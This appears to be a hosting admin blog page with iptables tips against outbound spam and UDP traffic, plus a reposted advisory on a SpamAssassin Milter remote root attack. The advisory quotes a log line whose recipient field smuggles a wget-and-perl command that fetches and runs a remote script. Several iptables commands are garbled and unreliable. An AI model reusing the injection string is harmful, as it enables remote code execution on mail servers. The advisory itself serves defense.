Pages

Categories

Archives

Need Support?

Pleas use our SSL protected Support Desk
Rack Admins Twitter

Most Popular

  1. 100% How to Install supermicro IPMI in a linux server
  2. 55% Apache - how to MPM-ITK by easyapache (part of WHM/cPanel)
  3. 20% How to block UDP packets on all ports except one
  4. 13% How to install PHP5-FSS 32bit on Ubuntu or Debian
  5. 11% How to protect own hosting from outdoring spam
August 16, 2011

How to protect own hosting from outdoring spam

Posted by: admin  :  Category: Firewall, Security

What if you have your own hosting and IP permanently blacklisted?
Procedure simply complaints from your customers?
How to solve this problem? Here to help !

Enough to limit the attempts to send too often and write to these attempts to log:

iptables -A FORWARD -p tcp -m tcp --dport 25 -m state --state NEW -m recent --update --s econds 60 --hitcount 6 --name SMTP_LOCAL --rsource -j  ---prefix "Spam:" ---nlgroup 2 ---cprange 100

Next example: protect ssh and ftp from bruteforce attaks, smtp from spam and web from & ddos

Read more…

VN:F [1.9.14_1148]
Rating: 10.0/10 (1 vote cast)
VN:F [1.9.14_1148]
Rating: 0 (from 0 votes)

Popularity: 11% [?]

Comments Off  :  Add Comment
July 31, 2011

How to block UDP packets on all ports except one

Posted by: admin  :  Category: Firewall, Security

This example block all incoming packets except port number 27005.:

 -A INPUT -p udp --dport 27005 -j ACCEPT
iptables -A INPUT -p udp -i lo -j ACCEPT #You may ignore this rule
iptables -A INPUT -p udo -s 0/0 -j DROP
VN:F [1.9.14_1148]
Rating: 10.0/10 (1 vote cast)
VN:F [1.9.14_1148]
Rating: +1 (from 1 vote)

Popularity: 20% [?]

Comment (1)  :  Add Comment
July 15, 2011

Spamassassin Milter Plugin Remote Root Attack

Posted by: admin  :  Category: Security

Observant reader Roy caught an interesting attempt against his SMTP server. His review of the logs turned up this:

Messages rejected to recipient: root+:|wget
hxxp://www.-echo.de/.x/p.txt;perl p.txt:   smtp.target.com[10.11.17.18] : User unknown in local recipient
table; from=<blue@attacker.com> to=<root+:|wget
hxxp://www.linux-echo.de/.x/p.txt : 1 Time(s)

Handler Bojan notes that it appears that the bad guys have started to actively exploit ’s that has been published last weekend (more details at http://archives.neohapsis.com/archives/fulldisclosure/2010-03/0139.html).

The perl script collects some information about the local host and tries to send it to 203.59.123.114 on port 80 — this host appears to be unreachable at the moment though.

Mitigation: There is a preliminary patch available at the SpamAssassin Milter Plugin project site, bug #29136: SpamAssassin Milter Plugin Input Validation Flaw Lets Users Execute Arbitrary Code: http://savannah.nongnu.org/bugs/index.php?29136

Alternatively, don’t use the -x option when running this plugin, as well do not run it as root.

http://isc.sans.org/diary.html?storyid=8434

VN:F [1.9.14_1148]
Rating: 1.0/10 (1 vote cast)
VN:F [1.9.14_1148]
Rating: 0 (from 0 votes)

Popularity: 8% [?]

Comment (1)  :  Add Comment

RSS Feed

Search


Blog Roll